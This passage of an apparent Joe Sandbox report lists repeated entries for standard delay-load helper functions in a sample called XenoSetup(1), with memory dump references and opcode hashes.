                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 2c76df64b5be95e9ddee889256f7193c2ce5fd5956d136e134e512d9c4fcb518
                                                                                      • Instruction ID: c9e22365c5ca2aad589989fdf51e583b0979f950f210bc0d7b5d9f060f378dfb
                                                                                      • Opcode Fuzzy Hash: 2c76df64b5be95e9ddee889256f7193c2ce5fd5956d136e134e512d9c4fcb518
                                                                                      • Instruction Fuzzy Hash: E9B012D6298244BE311421475D43C37121CDAC1F20330843EFD42C8470E844DC402431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFEAF9
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: d8528d444d9ac19fc9fde5cda0f7886374fdc65b0b27a7ccc749f4c9af8b83b9
                                                                                      • Instruction ID: 7c4481b9b1abe260f2628409daf318ebc88898e075629126c5aec8e96538f607
                                                                                      • Opcode Fuzzy Hash: d8528d444d9ac19fc9fde5cda0f7886374fdc65b0b27a7ccc749f4c9af8b83b9
                                                                                      • Instruction Fuzzy Hash: F7B012C72DA1967D310472415E42C37010CEAC0FE0330952FFA81CC075DC885C012431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c3eeea6f885d59002f5cfb34b4a381d40e9e5ecbed0a6a95b30e43a0a5686ed2
                                                                                      • Instruction ID: 3adfa0099b5e22358c695b8352258a3c3b2598f1ba35d657c41f1fe1872b35ee
                                                                                      • Opcode Fuzzy Hash: c3eeea6f885d59002f5cfb34b4a381d40e9e5ecbed0a6a95b30e43a0a5686ed2
                                                                                      • Instruction Fuzzy Hash: 54B012E2298104AD311461075E02D37529CDAC0F20330403EF946C8070EC449D412431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: b674d1081240b7974e6bb6a56cd9c7b19fc7d2e56f3b917cf934aba687be840d
                                                                                      • Instruction ID: 68417d9b123d115bd3cce75a326ded5d875ff3d1d8017ef18dc2e8b4681bcdd0
                                                                                      • Opcode Fuzzy Hash: b674d1081240b7974e6bb6a56cd9c7b19fc7d2e56f3b917cf934aba687be840d
                                                                                      • Instruction Fuzzy Hash: 61B012D6298144AD311461175D02D37125CDAC1F20330803EFE46C8070E844DC402431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 1abd68306cbe060daeb945f479f2b395504210ba621e02257c2d8c35aa87befb
                                                                                      • Instruction ID: b1cf749793cd34ae8b0a09d7cd83559eefe80957b3e97e65c9e7276d65361d62
                                                                                      • Opcode Fuzzy Hash: 1abd68306cbe060daeb945f479f2b395504210ba621e02257c2d8c35aa87befb
                                                                                      • Instruction Fuzzy Hash: 71B012D22A9144AD311461075D02D37125DEFC0F20330403EFD47C8070E8449C402431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c6c93aa6382696003c45b8f910fa964c6268f364695c3ead84c9e02749adc2c8
                                                                                      • Instruction ID: 11437fc490e9f425e7275baa3a8a69aa2fc47e5f37d4d15c565684070c27e91f
                                                                                      • Opcode Fuzzy Hash: c6c93aa6382696003c45b8f910fa964c6268f364695c3ead84c9e02749adc2c8
                                                                                      • Instruction Fuzzy Hash: 14B012E2299244BD315462075D02D37121DDBC0F20330413EFD46C8070E8449C842431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 26a55cb5472656cd36dc36df79a6bc0d35c544cc688fe2484e9966e91f233b41
                                                                                      • Instruction ID: 660484ab435d9d44e5a0d30207bb24af9fc96e61cc8ac6f953d44cd796cb5375
                                                                                      • Opcode Fuzzy Hash: 26a55cb5472656cd36dc36df79a6bc0d35c544cc688fe2484e9966e91f233b41
                                                                                      • Instruction Fuzzy Hash: 04B012D2299184AD311461075D02D37121DDBC1F20330803EFD46C8070E844DC402431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: fb6553e5a9ba683b27ae0ca827607a10fd5b2aab3c5047e1d1c801236d387d48
                                                                                      • Instruction ID: 17aefef5f5f0e2dcc8ac035e828aaefea8daef43209d663d928ce06bdd50e872
                                                                                      • Opcode Fuzzy Hash: fb6553e5a9ba683b27ae0ca827607a10fd5b2aab3c5047e1d1c801236d387d48
                                                                                      • Instruction Fuzzy Hash: F6B012E2298104AD311461075D02D37521CEAC0F20330403EF946C8071E8449D402431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 41c053d7e201ac0f78651328384d83f8f48832431e0c76193539e7dd52e76508
                                                                                      • Instruction ID: 24733c11c00824f213f27cc2a6f85c97253c0c8b453ffcfceb9be3eb515e8f30
                                                                                      • Opcode Fuzzy Hash: 41c053d7e201ac0f78651328384d83f8f48832431e0c76193539e7dd52e76508
                                                                                      • Instruction Fuzzy Hash: 46B012E2298104AD311461075E02D37521CDAC0F20330403EF946C8070EC449E412431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 24447fae579312a053537edff96f2979c7befea3a9fae76070ecc15bc1188526
                                                                                      • Instruction ID: 8648420911f7f6f9053b4a9b47ef74cbd914067d5de93e6c108cfef91af8990f
                                                                                      • Opcode Fuzzy Hash: 24447fae579312a053537edff96f2979c7befea3a9fae76070ecc15bc1188526
                                                                                      • Instruction Fuzzy Hash: 60B012E2298204BD315461075D02D37121CDAC0F20330413EF946C8070E8449D802431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 8c3a62e4d9d52038bf87dafa30a5436982d6fbf044e66237e8cb5b1118deaa60
                                                                                      • Instruction ID: 956a03756cfbb88924d65c732d59c2b7ae71bb1b4785c767ba97f4aaac1bdf8c
                                                                                      • Opcode Fuzzy Hash: 8c3a62e4d9d52038bf87dafa30a5436982d6fbf044e66237e8cb5b1118deaa60
                                                                                      • Instruction Fuzzy Hash: 9DB012E2298144BD311461075D02D37121CDAC1F20330813EFD46C8070E844DD402431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 40ab02e4fe59e072e4be6d226cee489687ed623d9c86877383c80a15cf56f40d
                                                                                      • Instruction ID: 148b19c53172a856633173ceb2029b6fcd57452949219eb81dc55c50891a5190
                                                                                      • Opcode Fuzzy Hash: 40ab02e4fe59e072e4be6d226cee489687ed623d9c86877383c80a15cf56f40d
                                                                                      • Instruction Fuzzy Hash: 8BB012D2298114BD311462075E02D37521CDAC0F20330803EF946C8170EC549D492431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: af129d5283faeefdf81a858aa5c7ae47199415bd0fbaf77ff9b23f36ef1b00c4
                                                                                      • Instruction ID: 123eb450d8a8ba58266945179a779cd30f5c55d5aa0be7a2d1b25390ffdf6136
                                                                                      • Opcode Fuzzy Hash: af129d5283faeefdf81a858aa5c7ae47199415bd0fbaf77ff9b23f36ef1b00c4
                                                                                      • Instruction Fuzzy Hash: 7FB012D2398244BD315462075D02D37121CDAC0F20330853EF946C8170E8449C842431
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 4e376caa3b786d33b24c79c7afb4b611a72e0db64cce74ceb74c9236cb736460
                                                                                      • Instruction ID: f12b823892769d10e61f94a44e7bb3c1dd81545022be2550f69fe7d38112cbb5
                                                                                      • Opcode Fuzzy Hash: 4e376caa3b786d33b24c79c7afb4b611a72e0db64cce74ceb74c9236cb736460
                                                                                      • Instruction Fuzzy Hash: B3B012E2298254BD3008E1055D06D37024CD9C4F20330D52EFA45C9074D8449C042833
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE3FC
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c8cec5e91fe5a2c7d26797952b41f26e4955b6d21e6ba347d155b90a6ed367ec
                                                                                      • Instruction ID: 3946b1b82c8f5c109948892b245e0b10216b8850c42a03ba372a0bb261250e44
                                                                                      • Opcode Fuzzy Hash: c8cec5e91fe5a2c7d26797952b41f26e4955b6d21e6ba347d155b90a6ed367ec
                                                                                      • Instruction Fuzzy Hash: C2B012F2298254BD3008A1055D06D37020CD9C4F20330962EFA45C9074D8489D002433
                                                                                      APIs
